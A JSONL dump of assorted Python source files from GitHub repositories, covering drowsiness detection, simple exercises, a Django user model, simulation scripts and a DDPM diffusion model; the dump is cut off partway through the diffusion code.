1)\r\n #cv2.drawContours(frame, [jawHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [reHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [leHull], -1, (255, 255, 0), 1)\r\n if ear < thresh:\r\n\r\n if flag == 0 and time.time()-lastBlink > 1:\r\n blink += 1\r\n lastBlink = time.time()\r\n print(\"Blink Detected\", blink)\r\n \r\n\r\n print (flag,end=' ')\r\n flag += 1\r\n if(flag > 10):\r\n cv2.putText(frame, \" STAY ALERT \", (200, 400),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n cv2.putText(frame, \" DON'T SLEEP \", (200,450),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n siren = 1\r\n\r\n\r\n else:\r\n flag = 0\r\n\r\n if(time.time()- start > 60):\r\n print(\"Blink Per minute :\",blink)\r\n p = np.array([blink]).reshape((1,-1))\r\n op = clf.predict(p)\r\n print('Chances of Drowsy :', op[0])\r\n start = time.time()\r\n blink = 0\r\n timer1 = 0\r\n\r\n if op[0] > 0:\r\n cv2.putText(frame, \" STAY ALERT \", (200, 400),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n cv2.putText(frame, \" YOU MAYBE SLEEPY \", (200,450),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n drowsy = 1\r\n siren = 1\r\n if(timer1 == 0):\r\n start= time.time()\r\n timer1 = 1 \r\n\r\n elif(timer1 == 1 and ((time.time()- start) > 10)):\r\n op=0\r\n\r\n\r\n if(mouthEAR < 5):\r\n flag1 += 1\r\n if flag1 > frame_check:\r\n yawn += 1\r\n print(\"Yawn detected\")\r\n flag1 = 0\r\n\r\n else:\r\n flag1 = 0\r\n except:\r\n pass\r\n\r\n\r\n\r\n endfps = time.time()\r\n fps = int(1/(endfps-startfps))\r\n cv2.putText(frame, \"FPS:- \"+str(fps), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n\r\n if(time.time() - start2 > 30):\r\n print('Yawns ', yawn)\r\n print('BPM : ', blink2)\r\n\r\n if(yawn > 1 or (3 <= blink <= 4)):\r\n cv2.putText(frame, \"Chances of Drowsiness Soon\", (1, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n chances = 1\r\n siren = 1\r\n\r\n yawn = 0\r\n blink2 = 0\r\n start2 = time.time()\r\n \r\n\r\n startfps = time.time()\r\n Clock.schedule_once(partial(self.display_frame, frame),1/120)\r\n #cv2.imshow('Hidden', frame)\r\n cv2.waitKey(1)\r\n #cv2.imshow(\"Sleepiness Monitor\", frame)\r\n #Clock.schedule_interval(self.update, 1.0/33.0)\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == 27:\r\n break\r\n if siren == 1:\r\n sound = SoundLoader.load('siren.wav')\r\n sound.play()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n '''\r\n Function to capture the images and give them the names\r\n according to their captured time and date.\r\n '''\r\n\r\n def display_frame(self, frame, dt):\r\n # display the current video frame in the kivy Image widget\r\n # create a Texture the correct size and format for the frame\r\n texture = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\r\n # copy the frame data into the texture\r\n texture.blit_buffer(frame.tobytes(order=None), colorfmt='bgr', bufferfmt='ubyte')\r\n # flip the texture (otherwise the video is upside down\r\n texture.flip_vertical()\r\n # actually put the texture in the kivy Image widget\r\n self.main_screen.ids.vid.texture = texture\r\n\r\n\r\n\r\nMain().run()\r\n","repo_name":"ShanmukhP/Drowsiness_Detecting_Application","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7254708121","text":"\n'''\n---Program 16---\nWrite a menu driven program in python to create, add, delete, search and display dictionary details\n'''\n\nd = dict()\nwhile True:\n print(''' Menu\n#1 Create dictionary of names and ages\n#2 Add a key\n#3 Delete a key\n#4 Search and Display\n#5 Exit''')\n z = input(\"Enter your choice:\")\n print(\"\\n\")\n if z == '1':\n l = int(input(\"Enter the length of the dictionary:\"))\n for c in range(l):\n k = input(\"Enter user's name: \")\n v = input(\"Enter user's age: \")\n print(\"\\n\")\n d[k] = v\n print(\"The entered dictionary: \",d,\"\\n\")\n elif z == '2':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter user's name: \")\n print(\"\\n\")\n v = input(\"Enter user's age: \")\n d[k]= v\n print(\"\\n\")\n print(\"Updated Dictionary:\",d)\n elif z == '3':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter the key value to delete:\")\n print(\"\\n\")\n if k in d:\n del(d[k])\n print(\"Updated Dictionary: \",d,\"\\n\")\n else:\n print(\"Name not found\\n\")\n elif z == '4':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter the name to be searched:\")\n print(\"\\n\")\n if k in d:\n print(\"The age: \",d[k],\"\\n\")\n else:\n print(\"Name not found\\n\")\n elif z == '5':\n print(\"Exiting now...\")\n break\n","repo_name":"Impaler343/Grade11","sub_path":"DICTIONARY1.py","file_name":"DICTIONARY1.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22549187387","text":"from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db.models import (\n EmailField,\n CharField,\n DateField,\n IntegerField,\n SmallIntegerField,\n BooleanField,\n)\n\n\nclass UserManager(BaseUserManager):\n def create_user(\n self,\n email,\n gender,\n food_preference,\n first_name,\n last_name,\n birth_date,\n phone,\n address_line_1,\n zip,\n city,\n state,\n password=None,\n address_line_2=None,\n ):\n user = self.model(\n email=email,\n gender=gender,\n food_preference=food_preference,\n first_name=first_name,\n last_name=last_name,\n birth_date=birth_date,\n phone=phone,\n address_line_1=address_line_1,\n address_line_2=address_line_2,\n zip=zip,\n city=city,\n state=state,\n )\n user.set_password(password)\n user.save()\n return user\n\n def create_superuser(\n self,\n email,\n gender,\n food_preference,\n first_name,\n last_name,\n birth_date,\n phone,\n address_line_1,\n zip,\n city,\n state,\n password=None,\n address_line_2=None,\n ):\n user = self.create_user(\n email=email,\n password=password,\n gender=gender,\n food_preference=food_preference,\n first_name=first_name,\n last_name=last_name,\n birth_date=birth_date,\n phone=phone,\n address_line_1=address_line_1,\n address_line_2=address_line_2,\n zip=zip,\n city=city,\n state=state,\n )\n user.is_superuser = True\n user.is_staff = True\n user.save()\n return user\n\n\nclass UserProfile(AbstractBaseUser, PermissionsMixin):\n GENDER_MALE = 0\n GENDER_FEMALE = 1\n GENDER_DIVERSE = 2\n GENDER_OPTIONS = (\n (GENDER_MALE, \"male\"),\n (GENDER_FEMALE, \"female\"),\n (GENDER_DIVERSE, \"diverse\"),\n )\n\n FOOD_OMNIVOUROUS = 0\n FOOD_VEGETARIAN = 1\n FOOD_OPTIONS = ((FOOD_OMNIVOUROUS, \"omnivourous\"), (FOOD_VEGETARIAN, \"vegetarian\"))\n\n email = EmailField(unique=True, verbose_name=\"Email address\")\n is_active = BooleanField(default=True)\n is_staff = BooleanField(default=False)\n gender = SmallIntegerField(choices=GENDER_OPTIONS)\n food_preference = SmallIntegerField(choices=FOOD_OPTIONS)\n first_name = CharField(max_length=254, verbose_name=\"First name\")\n last_name = CharField(max_length=254, verbose_name=\"Last name\")\n birth_date = DateField()\n phone = IntegerField()\n address_line_1 = CharField(max_length=254)\n address_line_2 = CharField(max_length=254, blank=True, null=True)\n zip = CharField(max_length=254)\n city = CharField(max_length=254)\n state = CharField(max_length=254)\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\n \"gender\",\n \"food_preference\",\n \"first_name\",\n \"last_name\",\n \"birth_date\",\n \"phone\",\n \"address_line_1\",\n \"zip\",\n \"city\",\n \"state\",\n ]\n\n objects = UserManager()\n\n def get_full_name(self):\n return self.first_name + \" \" + self.last_name\n\n def get_short_name(self):\n return self.first_name\n","repo_name":"DMUN-e-V/munkey","sub_path":"user_management/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10391299169","text":"import pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\nimport jax.random as random\nimport os\nimport time\n\nimport compute_pmass as pm\n\n# \"fixed_ratio\", \"fixed_alts\", \"fixed_choosers\"\nMODE = \"fixed_ratio\"\nVERBOSE = True\nDEBUG = True\n\nALTS_SIZES = [\n 200,\n # 2000,\n # 20000,\n # 200000,\n # 2000000\n]\n\nCHOOSER_SIZES = [\n # 750,\n # 7500,\n # 75000,\n # 750000,\n 7500000\n]\n\n\nALTS_TO_ITERS = {200: 10, 2000: 10, 20000: 10, 200000: 10, 2000000: 10}\nPOP_TO_ALTS_RATIO = 750 / 200\nSCALE_PARAMS = [.25, .5, .75, 1, 1.25, 1.5, 1.75]\nSAMPLE_RATES = [.1, .2, .3, .4, .5, .6, .7, .8, .9, 1]\nCOEFFS = np.array([-1, 1, 1, 1, 1]) # dist-to-cbd, sizes 1-3, intx term\nOUTFILE = '../data/disp_err_scale_iters_importance.csv'\n\n\ndef run(mode=MODE):\n key = random.PRNGKey(0)\n if os.path.exists(OUTFILE):\n df = pd.read_csv(OUTFILE)\n else:\n df = pd.DataFrame()\n for num_choosers in CHOOSER_SIZES:\n if MODE == 'fixed_ratio':\n ALTS_SIZES = [int(num_choosers) * (2.0 / 7.5)]\n for num_alts in ALTS_SIZES:\n\n run_id = df['run_id'].max() + 1 if len(df) > 0 else 1\n\n num_iters = ALTS_TO_ITERS[num_alts]\n print(\"RUNNING {0} ITERATIONS WITH {1} ALTS and {2} CHOOSERS\".format(\n num_iters, num_alts, num_choosers))\n\n for i in tqdm(range(num_iters)):\n \n iter_df = pd.DataFrame()\n disable = (max(num_alts, num_choosers) < 200000) and (VERBOSE is False)\n for scale_param in tqdm(SCALE_PARAMS, disable=disable):\n sttm = time.time()\n scale_df = pm.run_v2(\n num_alts, num_choosers, SAMPLE_RATES, COEFFS, key,\n batched=True, scale=scale_param, debug=DEBUG, verbose=VERBOSE)\n endtm = time.time()\n scale_df['scale'] = scale_param\n scale_df['runtime'] = endtm - sttm\n iter_df = pd.concat((iter_df, scale_df), ignore_index=True)\n iter_df['run_id'] = run_id\n iter_df['num_alts'] = num_alts\n iter_df['num_choosers'] = num_choosers\n df = pd.concat((df, iter_df), ignore_index=True)\n df.to_csv(OUTFILE, index=False)\n run_id += 1\n\n df = df.replace(np.inf, np.nan)\n\n return df\n\n\nif __name__ == '__main__':\n\n df = run()\n","repo_name":"mxndrwgrdnr/simulation_bias","sub_path":"scripts/compute_disp_err.py","file_name":"compute_disp_err.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21495538596","text":"from sys import stdin\r\nfrom itertools import permutations\r\n\r\na, b = stdin.readline().rstrip().split()\r\nb = int(b)\r\na_arr = []\r\nc = -1\r\n\r\nfor i in permutations(a):\r\n a_arr.append(''.join(i))\r\n\r\nfor i in a_arr:\r\n if i[0] == '0':\r\n continue\r\n i = int(i)\r\n if i < b:\r\n c = max(c, i)\r\n\r\nprint(c)","repo_name":"youngeun10/baekjoon","sub_path":"백준/Silver/16943. 숫자 재배치/숫자 재배치.py","file_name":"숫자 재배치.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4443738827","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n roman = {\"I\": 1, \"V\": 5, \"X\": 10,\"L\": 50,\"C\":100,\"D\": 500,\"M\":1000}\n result = ''\n for key, value in roman.items():\n x, y = divmod(num, value)\n result += key * x\n num = y\n\n return result","repo_name":"Kodirova/LeetCodeSolutions","sub_path":"intToRoman.py","file_name":"intToRoman.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23035620088","text":"import cv2\nimport numpy as np\nimport imutils\n\n# globals\nbg = None\n\n\ndef run_avg(image, aWeight):\n \"\"\"\n Calculate running average between the background model and current frame.\n :param image:\n :param aWeight:\n :return:\n \"\"\"\n\n global bg\n # if there is no bg (because it's currently the first frame)\n # then initialize it with the current frame\n if bg is None:\n bg = image.copy().astype(\"float\")\n return\n\n cv2.accumulateWeighted(image, bg, aWeight)\n\n\ndef segment(image, threshold=25):\n global bg\n diff = cv2.absdiff(bg.astype('uint8'), image)\n\n # threshold the diff'd image and get the contours of only hands\n thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]\n cnts, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # if no contours detected return\n if len(cnts) == 0:\n return\n else:\n segmented = max(cnts, key=cv2.contourArea)\n return thresholded, segmented\n\n\nif __name__ == '__main__':\n # running average weight\n aWeight = 0.5\n # webcam reference\n camera = cv2.VideoCapture(0)\n # region of interest\n top, right, bottom, left = 10, 350, 225, 590\n # initialize num_frames\n num_frames = 0\n\n while True:\n # get current frame and resize and flip so it's not mirrored\n (grabbed, frame) = camera.read()\n frame = imutils.resize(frame, width=700)\n frame = cv2.flip(frame, 1)\n\n clone = frame.copy()\n (height, width) = frame.shape[:2]\n roi = frame[top:bottom, right:left]\n\n # convert region of interest to grayscale and blur\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n # calibrate background until threshold reached\n if num_frames < 30:\n run_avg(gray, aWeight)\n else:\n # segment the hand region and then check\n hand = segment(gray)\n if hand is not None:\n # if it exists, unpack the thresholded image, draw, and display\n (thresholded, segmented) = hand\n cv2.drawContours(clone, [segmented + (right, top)], -1, (0, 0, 255))\n cv2.imshow('Thresholded', thresholded)\n\n # draw segmented hand, increment frames and display\n cv2.rectangle(clone, (left, top), (right, bottom), (0, 255, 0), 2)\n num_frames += 1\n cv2.imshow(\"Video Feed\", clone)\n\n # wait for keypress to signal interrupt; \"q\" to stop loop\n keypress = cv2.waitKey(1) & 0xFF\n if keypress == ord('q'):\n break\n\n # free memory\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"sydneyq/Count-Recognition","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1145761167","text":"import json\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom formulae import *\nfrom random import random\nfrom typing import List, Tuple\n\nfrom result import Result, Series\n\n\ndef main():\n rock_types, data = read_data()\n\n res = {}\n\n pore_size_range = (1, 100)\n salinity_range = (0.5, 3.5)\n\n for source in data:\n rt = source[\"rock_type\"]\n \n if rt not in res:\n res[rt] = Series(rt)\n\n for _ in range(100):\n pore_size = round((pore_size_range[1] - pore_size_range[0]) * random() + pore_size_range[0]) / 10**9\n salinity = round((salinity_range[1] - salinity_range[0]) * random(), 2) + salinity_range[0]\n res[rt].run(source[\"data\"], pore_size, salinity)\n\n for _, series in res.items():\n series.plot()\n\n\ndef read_data():\n with open(\"rock_types.json\") as rf:\n rock_types = json.load(rf)\n with open(\"data.json\") as df:\n data = json.load(df)\n\n return rock_types, data\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Vesafary/hydrogen-store","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74265790240","text":"def extract_route(s):\n s = s.upper().split()\n Blocks = ['И-', 'Э-', 'Р-', \"ГУК-\", \"Т-\", \"ВХО\",\"ВЫХОД\"]\n Result = []\n for symbol in Blocks:\n for i in s:\n if i.count(symbol) == 1:\n i = i.replace('А', \"1\")\n i = i.replace('Б', \"2\")\n if i.count(\"ВХО\") == 1:\n Result.append(\"Р-0000\")\n elif i.count(\"ВЫХОД\") == 1:\n Result.append(\"Р-0000\")\n else:\n Result.append(i)\n\n print(Result)\n return Result\n\n\ndef fixer(i):\n\n i = i.upper()\n i = i.replace('А', \"1\")\n i = i.replace('Б', \"2\")\n i = i.replace('ВХОД', \"Р-0000\")\n i = i.replace('ВЫХОД', \"Р-0000\")\n print(i)\n return i\n","repo_name":"Molochko1990/UniversityNavigator","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24458799493","text":"from functools import partial\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\nfrom tqdm import tqdm\n\nfrom .unet import UNetModel\nfrom .utils import (DiagonalGaussianDistribution, default, exists, mean_flat,\n normal_kl)\n\n\ndef extract_into_tensor(a, t, x_shape):\n b, *_ = t.shape\n out = a.gather(-1, t)\n return out.reshape(b, *((1,) * (len(x_shape) - 1)))\n\n\ndef noise_like(shape, device, repeat=False):\n repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(\n shape[0], *((1,) * (len(shape) - 1))\n )\n noise = lambda: torch.randn(shape, device=device)\n return repeat_noise() if repeat else noise()\n\n\ndef make_beta_schedule(\n schedule, n_timestep, linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3\n):\n if schedule == \"linear\":\n betas = (\n torch.linspace(\n linear_start**0.5, linear_end**0.5, n_timestep, dtype=torch.float64\n )\n ** 2\n )\n\n elif schedule == \"cosine\":\n timesteps = (\n torch.arange(n_timestep + 1, dtype=torch.float64) / n_timestep + cosine_s\n )\n alphas = timesteps / (1 + cosine_s) * np.pi / 2\n alphas = torch.cos(alphas).pow(2)\n alphas = alphas / alphas[0]\n betas = 1 - alphas[1:] / alphas[:-1]\n betas = np.clip(betas, a_min=0, a_max=0.999)\n\n elif schedule == \"sqrt_linear\":\n betas = torch.linspace(\n linear_start, linear_end, n_timestep, dtype=torch.float64\n )\n elif schedule == \"sqrt\":\n betas = (\n torch.linspace(linear_start, linear_end, n_timestep, dtype=torch.float64)\n ** 0.5\n )\n else:\n raise ValueError(f\"schedule '{schedule}' unknown.\")\n return betas.numpy()\n\n\ndef make_ddim_timesteps(ddim_discr_method, num_ddim_timesteps, num_ddpm_timesteps):\n if ddim_discr_method == \"uniform\":\n c = num_ddpm_timesteps // num_ddim_timesteps\n ddim_timesteps = np.asarray(list(range(0, num_ddpm_timesteps, c)))\n elif ddim_discr_method == \"quad\":\n ddim_timesteps = (\n (np.linspace(0, np.sqrt(num_ddpm_timesteps * 0.8), num_ddim_timesteps)) ** 2\n ).astype(int)\n else:\n raise NotImplementedError(\n f'There is no ddim discretization method called \"{ddim_discr_method}\"'\n )\n\n # assert ddim_timesteps.shape[0] == num_ddim_timesteps\n # add one to get the final alpha values right (the ones from first scale to data during sampling)\n steps_out = ddim_timesteps + 1\n return steps_out\n\n\ndef make_ddim_sampling_parameters(alphacums, ddim_timesteps, eta):\n alphas = alphacums[ddim_timesteps]\n alphas_prev = np.asarray([alphacums[0]] + alphacums[ddim_timesteps[:-1]].tolist())\n\n sigmas = eta * np.sqrt(\n (1 - alphas_prev) / (1 - alphas) * (1 - alphas / alphas_prev)\n )\n return sigmas, alphas, alphas_prev\n\n\nclass DDPM(nn.Module):\n def __init__(\n self,\n timesteps=1000,\n beta_schedule=\"linear\",\n loss_type=\"l2\",\n ckpt_path=None,\n ignore_keys=[],\n load_only_unet=False,\n first_stage_key=\"image\",\n image_size=256,\n channels=3,\n log_every_t=100,\n clip_denoised=True,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n given_betas=None,\n original_elbo_weight=0.0,\n v_posterior=0.0, # weight for choosing posterior variance as sigma = (1-v) * beta_tilde + v * beta\n l_simple_weight=1.0,\n parameterization=\"eps\", # all assuming fixed variance schedules\n scheduler_config=None,\n use_positional_encodings=False,\n learn_logvar=False,\n logvar_init=0.0,\n ):\n super().__init__()\n assert parameterization in [\n \"eps\",\n \"x0\",\n ], 'currently only supporting \"eps\" and \"x0\"'\n self.parameterization = parameterization\n print(\n f\"{self.__class__.__name__}: Running in {self.parameterization}-prediction mode\"\n )\n self.cond_stage_model = None\n self.clip_denoised = clip_denoised\n self.log_every_t = log_every_t\n self.first_stage_key = first_stage_key\n self.image_size = image_size # try conv?\n self.channels = channels\n self.use_positional_encodings = use_positional_encodings\n self.model = DiffusionWrapper()\n\n self.use_scheduler = scheduler_config is not None\n if self.use_scheduler:\n self.scheduler_config = scheduler_config\n\n self.v_posterior = v_posterior\n self.original_elbo_weight = original_elbo_weight\n self.l_simple_weight = l_simple_weight\n\n if ckpt_path is not None:\n self.init_from_ckpt(\n ckpt_path, ignore_keys=ignore_keys, only_model=load_only_unet\n )\n\n self.register_schedule(\n given_betas=given_betas,\n beta_schedule=beta_schedule,\n timesteps=timesteps,\n linear_start=linear_start,\n linear_end=linear_end,\n cosine_s=cosine_s,\n )\n\n self.loss_type = loss_type\n\n self.learn_logvar = learn_logvar\n self.logvar = torch.full(fill_value=logvar_init, size=(self.num_timesteps,))\n if self.learn_logvar:\n self.logvar = nn.Parameter(self.logvar, requires_grad=True)\n\n def register_schedule(\n self,\n given_betas=None,\n beta_schedule=\"linear\",\n timesteps=1000,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n ):\n if exists(given_betas):\n betas = given_betas\n else:\n betas = make_beta_schedule(\n beta_schedule,\n timesteps,\n linear_start=linear_start,\n linear_end=linear_end,\n cosine_s=cosine_s,\n )\n alphas = 1.0 - betas\n alphas_cumprod = np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1.0, alphas_cumprod[:-1])\n\n (timesteps,) = betas.shape\n self.num_timesteps = int(timesteps)\n self.linear_start = linear_start\n self.linear_end = linear_end\n assert (\n alphas_cumprod.shape[0] == self.num_timesteps\n ), \"alphas have to be defined for each timestep\"\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer(\"betas\", to_torch(betas))\n self.register_buffer(\"alphas_cumprod\", to_torch(alphas_cumprod))\n self.register_buffer(\"alphas_cumprod_prev\", to_torch(alphas_cumprod_prev))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer(\"sqrt_alphas_cumprod\", to_torch(np.sqrt(alphas_cumprod)))\n self.register_buffer(\n \"sqrt_one_minus_alphas_cumprod\", to_torch(np.sqrt(1.0 - alphas_cumprod))\n )\n self.register_buffer(\n \"log_one_minus_alphas_cumprod\", to_torch(np.log(1.0 - alphas_cumprod))\n )\n self.register_buffer(\n \"sqrt_recip_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod))\n )\n self.register_buffer(\n \"sqrt_recipm1_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod - 1))\n )\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = (1 - self.v_posterior) * betas * (\n 1.0 - alphas_cumprod_prev\n ) / (1.0 - alphas_cumprod) + self.v_posterior * betas\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n self.register_buffer(\"posterior_variance\", to_torch(posterior_variance))\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer(\n \"posterior_log_variance_clipped\",\n to_torch(np.log(np.maximum(posterior_variance, 1e-20))),\n )\n self.register_buffer(\n \"posterior_mean_coef1\",\n to_torch(betas * np.sqrt(alphas_cumprod_prev) / (1.0 - alphas_cumprod)),\n )\n self.register_buffer(\n \"posterior_mean_coef2\",\n to_torch(\n (1.0 - alphas_cumprod_prev) * np.sqrt(alphas) / (1.0 - alphas_cumprod)\n ),\n )\n\n if self.parameterization == \"eps\":\n lvlb_weights = self.betas**2 / (\n 2\n * self.posterior_variance\n * to_torch(alphas)\n * (1 - self.alphas_cumprod)\n )\n elif self.parameterization == \"x0\":\n lvlb_weights = (\n 0.5\n * np.sqrt(torch.Tensor(alphas_cumprod))\n / (2.0 * 1 - torch.Tensor(alphas_cumprod))\n )\n else:\n raise NotImplementedError(\"mu not supported\")\n # TODO how to choose this term\n lvlb_weights[0] = lvlb_weights[1]\n self.register_buffer(\"lvlb_weights\", lvlb_weights, persistent=False)\n assert not torch.isnan(self.lvlb_weights).all()\n\n def init_from_ckpt(self, path, ignore_keys=list(), only_model=False):\n sd = torch.load(path, map_location=\"cpu\")\n if \"state_dict\" in list(sd.keys()):\n sd = sd[\"state_dict\"]\n keys = list(sd.keys())\n for k in keys:\n for ik in ignore_keys:\n if k.startswith(ik):\n print(\"Deleting key {} from state_dict.\".format(k))\n del sd[k]\n missing, unexpected = (\n self.load_state_dict(sd, strict=False)\n if not only_model\n else self.model.load_state_dict(sd, strict=False)\n )\n\n def q_mean_variance(self, x_start, t):\n \"\"\"\n Get the distribution q(x_t | x_0).\n :param x_start: the [N x C x ...] tensor of noiseless inputs.\n :param t: the number of diffusion steps (minus 1). Here, 0 means one step.\n :return: A tuple (mean, variance, log_variance), all of x_start's shape.\n \"\"\"\n mean = extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n variance = extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)\n log_variance = extract_into_tensor(\n self.log_one_minus_alphas_cumprod, t, x_start.shape\n )\n return mean, variance, log_variance\n\n def predict_start_from_noise(self, x_t, t, noise):\n return (\n extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)\n * noise\n )\n\n def q_posterior(self, x_start, x_t, t):\n posterior_mean = (\n extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start\n + extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t\n )\n posterior_variance = extract_into_tensor(self.posterior_variance, t, x_t.shape)\n posterior_log_variance_clipped = extract_into_tensor(\n self.posterior_log_variance_clipped, t, x_t.shape\n )\n return posterior_mean, posterior_variance, posterior_log_variance_clipped\n\n def p_mean_variance(self, x, t, clip_denoised: bool):\n model_out = self.model(x, t)\n if self.parameterization == \"eps\":\n x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)\n elif self.parameterization == \"x0\":\n x_recon = model_out\n if clip_denoised:\n x_recon.clamp_(-1.0, 1.0)\n\n model_mean, posterior_variance, posterior_log_variance = self.q_posterior(\n x_start=x_recon, x_t=x, t=t\n )\n return model_mean, posterior_variance, posterior_log_variance\n\n @torch.no_grad()\n def p_sample(self, x, t, clip_denoised=True, repeat_noise=False):\n b, *_, device = *x.shape, x.device\n model_mean, _, model_log_variance = self.p_mean_variance(\n x=x, t=t, clip_denoised=clip_denoised\n )\n noise = noise_like(x.shape, device, repeat_noise)\n # no noise when t == 0\n nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n @torch.no_grad()\n def p_sample_loop(self, shape, return_intermediates=False):\n device = self.betas.device\n b = shape[0]\n img = torch.randn(shape, device=device)\n intermediates = [img]\n for i in tqdm(\n reversed(range(0, self.num_timesteps)),\n desc=\"Sampling t\",\n total=self.num_timesteps,\n ):\n img = self.p_sample(\n img,\n torch.full((b,), i, device=device, dtype=torch.long),\n clip_denoised=self.clip_denoised,\n )\n if i % self.log_every_t == 0 or i == self.num_timesteps - 1:\n intermediates.append(img)\n if return_intermediates:\n return img, intermediates\n return img\n\n @torch.no_grad()\n def sample(self, batch_size=16, return_intermediates=False):\n image_size = self.image_size\n channels = self.channels\n return self.p_sample_loop(\n (batch_size, channels, image_size, image_size),\n return_intermediates=return_intermediates,\n )\n\n def q_sample(self, x_start, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n return (\n extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n + extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape)\n * noise\n )\n\n def get_loss(self, pred, target, mean=True):\n if self.loss_type == \"l1\":\n loss = (target - pred).abs()\n if mean:\n loss = loss.mean()\n elif self.loss_type == \"l2\":\n if mean:\n loss = torch.nn.functional.mse_loss(target, pred)\n else:\n loss = torch.nn.functional.mse_loss(target, pred, reduction=\"none\")\n else:\n raise NotImplementedError(\"unknown loss type '{loss_type}'\")\n\n return loss\n\n def p_losses(self, x_start, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)\n model_out = self.model(x_noisy, t)\n\n loss_dict = {}\n if self.parameterization == \"eps\":\n target = noise\n elif self.parameterization == \"x0\":\n target = x_start\n else:\n raise NotImplementedError(\n f\"Paramterization {self.parameterization} not yet supported\"\n )\n\n loss = self.get_loss(model_out, target, mean=False).mean(dim=[1, 2, 3])\n\n log_prefix = \"train\" if self.training else \"val\"\n\n loss_dict.update({f\"{log_prefix}/loss_simple\": loss.mean()})\n loss_simple = loss.mean() * self.l_simple_weight\n\n loss_vlb = (self.lvlb_weights[t] * loss).mean()\n loss_dict.update({f\"{log_prefix}/loss_vlb\": loss_vlb})\n\n loss = loss_simple + self.original_elbo_weight * loss_vlb\n\n loss_dict.update({f\"{log_prefix}/loss\": loss})\n\n return loss, 